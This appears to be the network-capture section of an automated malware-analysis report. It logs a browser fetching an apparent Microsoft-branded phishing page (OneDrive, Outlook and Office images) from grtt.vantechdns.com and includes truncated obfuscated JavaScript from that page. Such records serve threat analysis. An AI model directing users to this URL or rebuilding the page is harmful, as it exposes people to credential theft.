Jan 20, 2025 00:19:49.780745983 CET	53	51816	1.1.1.1	192.168.2.6
Jan 20, 2025 00:20:10.421700954 CET	53	62203	1.1.1.1	192.168.2.6
Jan 20, 2025 00:20:14.123765945 CET	53	58589	1.1.1.1	192.168.2.6

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 20, 2025 00:19:18.607567072 CET	192.168.2.6	1.1.1.1	c1fb	(Port unreachable)	Destination Unreachable
Jan 20, 2025 00:19:23.711844921 CET	192.168.2.6	1.1.1.1	c23b	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:18 UTC	690	OUT	GET /bnnnnnnnnii99/new_87392/data HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:18 UTC	240	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sun, 19 Jan 2025 23:19:05 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 265 Connection: close Location: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/
2025-01-19 23:19:18 UTC	265	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 74 74 2e 76 61 6e 74 65 63 68 64 6e 73 2e 63 6f 6d 2f 62 6e 6e 6e 6e 6e 6e 6e 6e 69 69 39 39 2f 6e 65 77 5f 38 37 33 39 32 2f 64 61 74 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/">here</a>.</p></bod

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:18 UTC	691	OUT	GET /bnnnnnnnnii99/new_87392/data/ HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:18 UTC	204	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2025-01-19 23:19:18 UTC	16180	IN	Data Raw: 37 33 65 34 0d 0a 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 22 20 73 74 79 6c 65 3d 22 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 73e4<html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class=" responsive " style=""><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="msapplication-tap-highlight" content=
2025-01-19 23:19:18 UTC	13501	IN	Data Raw: 70 61 72 73 65 49 6e 74 28 68 28 30 78 61 38 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 68 28 30 78 39 62 29 29 2f 30 78 34 2b 70 61 72 73 65 49 6e 74 28 68 28 30 78 63 34 29 29 2f 30 78 35 2b 2d 70 61 72 73 65 49 6e 74 28 68 28 30 78 61 31 29 29 2f 30 78 36 2a 28 70 61 72 73 65 49 6e 74 28 68 28 30 78 64 38 29 29 2f 30 78 37 29 2b 70 61 72 73 65 49 6e 74 28 68 28 30 78 38 33 29 29 2f 30 78 38 2b 2d 70 61 72 73 65 49 6e 74 28 68 28 30 78 38 30 29 29 2f 30 78 39 2a 28 70 61 72 73 65 49 6e 74 28 68 28 30 78 62 33 29 29 2f 30 78 61 29 3b 69 66 28 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 5b 27 70 75 73 68 27 5d 28 65 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 67 29 7b 65 5b 27 70 75 73 68 27 5d 28 65 5b 27 73 68 69 66 74 Data Ascii: parseInt(h(0xa8))/0x3)+parseInt(h(0x9b))/0x4+parseInt(h(0xc4))/0x5+-parseInt(h(0xa1))/0x6(parseInt(h(0xd8))/0x7)+parseInt(h(0x83))/0x8+-parseInt(h(0x80))/0x9(parseInt(h(0xb3))/0xa);if(f===d)break;else e['push'](e['shift']());}catch(g){e['push'](e['shift

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:20 UTC	657	OUT	GET /bnnnnnnnnii99/new_87392/data/img/oneDrive.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:20 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:07 GMT Content-Type: image/png Content-Length: 19203 Connection: close Last-Modified: Sun, 06 Mar 2022 08:46:16 GMT Accept-Ranges: bytes
2025-01-19 23:19:20 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 20 00 00 01 e0 08 06 00 00 00 9c 89 d6 35 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 09 4f 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 35 20 37 39 2e 31 36 33 34 39 39 2c 20 32 30 31 38 2f 30 38 2f 31 33 2d 31 36 3a 34 30 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDR 5pHYsOiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RD
2025-01-19 23:19:20 UTC	3025	IN	Data Raw: 71 55 55 f7 26 18 79 ad 95 56 4c 9f 94 4d bf 3c 49 4c be bb 80 5f 4e bc 4f 53 57 c5 aa 2e 75 83 ba 6b a9 ba fa e5 30 cd cd c7 b8 40 5a 2f 48 95 e1 a1 a9 93 23 80 3c 43 fa 07 7c 2f 70 6f 0b 6d 29 61 06 78 90 ea bb 33 42 74 4f de 37 e6 f3 ce 92 56 de be f4 b0 57 ca fc 8b 94 9e a4 94 89 d0 d7 33 1d 05 f1 52 7e 7f 7f d7 5a 2b 9a f7 f3 c4 67 2d c5 b3 34 17 f6 53 96 2d d6 2d 82 35 ae 94 e7 6d 73 c7 de 33 54 ff 6c 5e ab 07 64 13 31 ff a3 8a 26 57 58 9e 27 6d d2 f2 b8 1b ec f5 52 8e 00 72 91 a8 b9 9f ea 00 e9 35 33 ba 68 17 f0 70 e2 7d 9e a5 99 bd 22 7c d3 c3 1b 54 af 95 31 4b 5a 50 54 77 bc 9f 7a e7 99 67 98 be 7d 59 ba e0 1c f0 6a c5 63 67 b8 fa e6 9d 9b a9 b6 b2 f0 79 9a 1b 7e 19 49 19 de ad 5b d9 b5 d7 72 04 10 88 f1 be d4 34 bd 40 84 90 49 9e bc b3 40 5a 25 Data Ascii: qUU&yVLM<IL_NOSW.uk0@Z/H#<C\|/pom)ax3BtO7VW3R~Z+g-4S--5ms3Tl^d1&WX'mRr53hp}"\|T1KZPTwzg}Yjcgy~I[r4@I@Z%

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:20 UTC	651	OUT	GET /bnnnnnnnnii99/new_87392/data/img/bg.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:20 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:07 GMT Content-Type: image/png Content-Length: 24287 Connection: close Last-Modified: Sun, 06 Mar 2022 08:28:56 GMT Accept-Ranges: bytes
2025-01-19 23:19:20 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 56 00 00 02 91 08 02 00 00 00 30 11 65 c7 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 5e 74 49 44 41 54 78 5e ed dd 89 7a d3 c8 da 2e 6c 56 ef 8f d5 dd f4 a2 81 30 84 21 21 84 84 cc 33 67 f2 9f ff c1 fc 25 a9 ac c9 43 5c 71 a5 ec c0 7d 5f ef 5e db 96 65 49 76 d2 7c 79 1e cb f6 b3 03 00 00 00 e0 37 f0 ec ff 03 00 00 00 7e 03 cf 9e 7d 3c df c0 79 b5 73 f2 ec ed a1 31 c6 18 63 8c 31 bf f9 6c da 1f c6 8e 67 f1 38 1e b3 e9 33 ca de 1b 32 7e 53 8d 31 c6 18 63 8c 09 23 52 2e 1e c7 b3 78 04 2b 33 9e 51 f6 de 90 f1 9b 6a 8c 31 c6 18 63 4c 18 91 72 f1 38 9e c5 23 58 99 f1 8c b2 f7 86 8c df 54 63 8c Data Ascii: PNGIHDRV0esRGBgAMAapHYsod^tIDATx^z.lV0!!3g%C\q}_^eIv\|y7~}<ys1c1lg832~S1c#R.x+3Qj1cLr8#XTc
2025-01-19 23:19:20 UTC	8109	IN	Data Raw: a7 c8 f1 71 80 95 a9 94 3e 88 fa e1 d6 98 93 67 bd fa dd dd b7 7a 25 3f 06 e3 de 06 43 5a ee 87 f3 20 6c 7c c6 5d 1a 93 4c 1e ee 35 7d 48 fd 6d e6 7a 23 c0 e8 d8 82 6a 47 bd 8d cf aa 00 9c 05 00 00 00 c0 2a 62 ac 4f 51 a6 02 68 22 77 7d a6 c0 8c 38 dd bf 6f b8 dc ac 53 5f 88 33 dc 72 ad 4a fe f5 ad 9f f7 9b 5c 5d 05 f8 66 49 1b ad fb ef 05 68 5e 96 ef 96 cc fe 38 c0 de 4e db db 66 55 00 bd 2d cf 38 b6 4a d5 02 4c 36 d5 d6 01 ed 93 10 66 6a 9b bf 03 15 00 00 00 40 2e 31 d6 a7 c8 55 01 c0 fd 54 00 00 00 00 b9 c4 58 9f 42 05 40 39 2a 00 00 00 80 5c 62 ac 4f a1 02 a0 1c 15 00 00 00 40 2e 31 d6 a7 50 01 50 8e 0a 00 00 00 20 97 18 eb 53 a8 00 28 47 05 00 00 00 90 4b 8c f5 29 54 00 94 a3 02 00 00 00 c8 25 c6 fa 14 2a 00 ca 51 01 00 00 00 e4 12 63 7d 0a 15 00 e5 Data Ascii: q>gz%?CZ l\|]L5}Hmz#jGbOQh"w}8oS_3rJ\]fIh^8NfU-8JL6fj@.1UTXB@9\bO@.1PP S(GK)T%*Qc}

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:20 UTC	656	OUT	GET /bnnnnnnnnii99/new_87392/data/img/outlook.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:20 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:07 GMT Content-Type: image/png Content-Length: 19931 Connection: close Last-Modified: Sat, 30 Jan 2021 00:38:16 GMT Accept-Ranges: bytes
2025-01-19 23:19:20 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 20 00 49 44 41 54 78 5e ed 9d 07 78 15 55 da 80 3f 42 2f 09 08 88 74 a5 43 e8 20 a0 54 a9 ba ae ba 22 ea da 76 57 fd 75 55 d6 2e bd 77 14 70 c5 8a bd 2b ea da b1 42 08 bd 4a 27 b4 84 22 20 45 10 a4 77 72 fe 67 12 a2 09 24 e4 de b9 e7 dc 7b cf cc 9b e7 d9 67 9f 5d 66 be f3 9d f7 3b c9 bc 33 73 e6 9c 3c c2 0f 04 20 00 01 08 40 00 02 be 23 90 27 5c 3d 3e 76 f2 b4 da b4 fb b0 6c dc 75 44 36 ee 3a 2c bb 0f 9d 90 23 c7 4f ca a1 63 a9 72 e2 54 6a b8 d2 a0 1d 08 40 00 02 10 80 40 c4 09 e4 cd 23 52 b0 40 5e 29 51 24 bf 5c 18 5b 40 2a 95 2a 2c 35 2e 2a 26 35 ca 16 93 42 f9 9d 7f 35 ff 63 ac 91 d4 54 a5 56 fe b2 5f 66 ac dd 23 f3 52 f6 ca 4f 1b f7 49 ca b8 4e e6 Data Ascii: PNGIHDRx IDATx^xU?B/tC T"vWuU.wp+BJ'" Ewrg${g]f;3s< @#'\=>vluD6:,#OcrTj@@#R@^)Q$\[@*,5.&5B5cTV_f#ROIN
2025-01-19 23:19:20 UTC	3753	IN	Data Raw: 01 b0 b6 74 24 ee 11 02 08 80 e1 42 22 00 86 01 13 de 5a 02 08 80 b5 a5 23 71 8f 10 40 00 0c 17 12 01 30 0c 98 f0 d6 12 40 00 ac 2d 1d 89 7b 84 00 02 60 b8 90 08 80 61 c0 84 b7 96 00 02 60 6d e9 48 dc 23 04 10 00 c3 85 44 00 0c 03 26 bc b5 04 10 00 6b 4b 47 e2 1e 21 80 00 18 2e 24 02 60 18 30 e1 ad 25 80 00 58 5b 3a 12 f7 08 01 04 c0 70 21 11 00 c3 80 09 6f 2d 01 04 c0 da d2 91 b8 47 08 20 00 86 0b 89 00 18 06 4c 78 6b 09 20 00 d6 96 8e c4 3d 42 00 01 30 5c 48 04 c0 30 60 c2 5b 4b 00 01 b0 b6 74 24 ee 11 02 08 80 e1 42 22 00 86 01 13 de 5a 02 08 80 b5 a5 23 71 8f 10 40 00 0c 17 12 01 30 0c 98 f0 d6 12 40 00 ac 2d 1d 89 7b 84 00 02 60 b8 90 08 80 61 c0 84 b7 96 00 02 60 6d e9 48 dc 23 04 10 00 c3 85 ac db 77 aa 5c db b8 ac 34 a8 54 5c 1a 56 2e 2e b5 cb 15 Data Ascii: t$B"Z#q@0@-{`a`mH#D&kKG!.$`0%X[:p!o-G Lxk =B0\H0`[Kt$B"Z#q@0@-{`a`mH#w\4T\V..

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:20 UTC	655	OUT	GET /bnnnnnnnnii99/new_87392/data/img/office.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:20 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:07 GMT Content-Type: image/png Content-Length: 17147 Connection: close Last-Modified: Sat, 30 Jan 2021 00:38:16 GMT Accept-Ranges: bytes
2025-01-19 23:19:20 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 20 00 49 44 41 54 78 5e ed 9d 09 b4 55 d5 7d ff 7f ef be e9 5e 24 0c e1 c1 03 34 89 c6 18 c4 01 1c 11 1c 98 1e 8f 19 51 d4 34 89 9a 9a ac 34 31 66 fa 27 6d d3 26 6d 52 d3 4c b6 69 33 ac 9a a6 36 cd 50 13 4d 52 13 67 19 45 10 51 1c 71 42 41 93 18 13 1c de 88 80 3c 78 f3 f9 af 73 2e a0 c8 7b f0 ee 3d 7b ef fb db e7 7c ba 56 57 3a dc b3 f7 6f 7f be bf b5 ce 87 df 3b f7 dc 32 e1 bf 20 00 01 08 40 00 02 10 48 1d 81 32 57 27 ee ed 68 0f 7a 5e 7a 51 ba b7 be 20 dd 5b ff 28 bd db 5a 24 d8 d3 26 41 db 2e e9 ed ee 74 55 06 fb 40 00 02 10 80 00 04 4a 4e a0 ac ac 42 a4 aa 5a ca 87 0c 95 cc 88 91 52 3e e6 28 a9 38 fa 38 a9 78 d7 7b 24 53 9d 75 72 6f b6 b6 49 d0 db Data Ascii: PNGIHDRx IDATx^U}^$4Q441f'm&mRLi36PMRgEQqBA<xs.{={\|VW:o;2 @H2W'hz^zQ [(Z$&A.tU@JNBZR>(88x{$SuroI
2025-01-19 23:19:20 UTC	969	IN	Data Raw: b1 fd 7f fa df ff 3f 84 2c 7a 5a 1a 83 c6 0f 4c e5 db 00 29 6c 0c 8e 0c 01 08 40 00 02 c9 25 d0 58 7f 92 8c bc e9 5e 29 1f 5e d3 b7 00 84 47 df 7e cd 17 82 a1 7f f7 2f c9 a5 c0 c9 20 00 01 08 40 00 02 29 23 b0 f3 bb 5f 96 a1 9f ff fa 01 ff e8 3f e0 7f 09 79 74 bf f4 62 d0 78 f9 5c 19 7b cf e6 94 e1 e1 b8 10 80 00 04 20 00 81 e4 11 68 ac 1f 2f 35 37 ac 96 8a da 23 0f 2d 00 d1 14 e0 fb 57 07 43 3f f3 4f c9 a3 c0 89 20 00 01 08 40 00 02 29 23 f0 fa 7f 5d 23 43 3e f1 c5 83 fe c1 7f d0 ff 21 e4 d2 b3 e3 b5 a0 e5 8a b9 32 ea e6 07 53 86 89 e3 42 00 02 10 80 00 04 92 43 a0 f1 92 b3 65 d4 cf 56 48 66 f0 90 81 09 40 78 f4 3d ab ef 0c b2 33 17 24 87 02 27 81 00 04 20 00 01 08 a4 8c 40 fb fa 55 92 3b 6f 76 9f ff d8 ef f3 ff 18 f2 09 df 0b b0 fd 1b 9f 97 61 ff f8 dd Data Ascii: ?,zZL)l@%X^)^G~/ @)#_?ytbx\{ h/57#-WC?O @)#]#C>!2SBCeVHf@x=3$' @U;ova

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:20 UTC	653	OUT	GET /bnnnnnnnnii99/new_87392/data/img/mail.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:20 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:07 GMT Content-Type: image/png Content-Length: 31505 Connection: close Last-Modified: Sat, 30 Jan 2021 00:38:16 GMT Accept-Ranges: bytes
2025-01-19 23:19:20 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 20 00 49 44 41 54 78 5e ec 9d 07 98 15 d5 f9 c6 df b9 bd ec 52 96 de 7b 5f d8 82 58 a2 31 b6 18 63 34 fe ed 58 a2 89 35 76 90 22 88 05 0b 20 28 88 3d f6 92 b0 8b 1a 5b 4c a2 31 96 58 12 0b 65 77 e9 75 d9 a5 97 7b a9 7b e7 f6 7b fe cf 99 85 c4 06 cc ec de 3b b7 bd fb 3c 3c 28 3b 73 ca ef fb 66 ce 3b e7 7c e7 3b 0a f8 43 02 24 40 02 24 40 02 24 90 77 04 94 bc eb 31 3b 4c 02 24 40 02 24 40 02 24 00 0a 00 3a 01 09 90 00 09 90 00 09 e4 21 01 0a 80 3c 34 3a bb 4c 02 24 40 02 24 40 02 14 00 f4 01 12 20 01 12 20 01 12 c8 43 02 14 00 79 68 74 76 99 04 48 80 04 48 80 04 28 00 e8 03 24 40 02 24 40 02 24 90 87 04 28 00 f2 d0 e8 ec 32 09 90 00 09 90 00 09 50 00 d0 Data Ascii: PNGIHDRx IDATx^R{_X1c4X5v" (=[L1Xewu{{{;<<(;sf;\|;C$@$@$w1;L$@$@$:!<4:L$@$@ CyhtvHH($@$@$(2P
2025-01-19 23:19:20 UTC	15327	IN	Data Raw: 89 db 17 ab 78 5d 32 b6 e8 3b 2b e0 00 8b c1 45 36 3c 5c 7e f0 b2 53 e7 19 2c 39 19 04 28 00 92 41 d1 58 19 9c 01 30 c6 ab c9 57 53 00 34 19 5d 46 dc b8 70 57 54 5c bf 20 80 af b6 c6 00 ab be 75 6e d9 70 65 8e 1f 27 77 b6 6b 83 7f 69 eb 83 07 ef 6d 0b 26 c4 9d 4b 82 78 66 b5 6a 28 9e 40 8a 80 9e ad ac 98 5e e2 c5 85 dd 53 1f 10 f7 ef 1d 51 31 aa aa 01 f3 b6 4b 0e 06 06 e8 38 f0 cb 6e 76 cc 2a 2d c0 a0 96 87 de c2 b7 27 92 10 33 56 06 31 63 59 08 51 b9 ab c2 80 d0 6a eb b1 62 f2 d0 1f ce 2e 64 84 13 b1 11 87 24 40 01 60 be 83 50 00 98 c4 9c 02 c0 24 d0 29 a8 e6 8d 0d 61 2d d8 6f fd 3e 79 88 8d ce 41 af d2 af 0d 5c 57 cf 0b 60 ea 30 0f da eb 58 9f 0e c6 84 78 7c 75 10 72 2b 5d 20 62 60 e0 ab f4 c9 58 00 8c 1a e0 c6 e4 62 37 2c 4a 6a 82 03 9f af 0d 8a bb 17 Data Ascii: x]2;+E6<\~S,9(AX0WS4]FpWT\ unpe'wkim&Kxfj(@^SQ1K8nv*-'3V1cYQjb.d$@`P$)a-o>yA\W`0Xx\|ur+] b`Xb7,Jj

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:23 UTC	388	OUT	GET /bnnnnnnnnii99/new_87392/data/img/oneDrive.png HTTP/1.1 Host: grtt.vantechdns.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:23 UTC	206	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 19 Jan 2025 23:19:10 GMT Content-Type: image/png Content-Length: 19203 Connection: close Last-Modified: Sun, 06 Mar 2022 08:46:16 GMT Accept-Ranges: bytes
2025-01-19 23:19:23 UTC	16178	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 20 00 00 01 e0 08 06 00 00 00 9c 89 d6 35 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 09 4f 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 35 20 37 39 2e 31 36 33 34 39 39 2c 20 32 30 31 38 2f 30 38 2f 31 33 2d 31 36 3a 34 30 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDR 5pHYsOiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RD
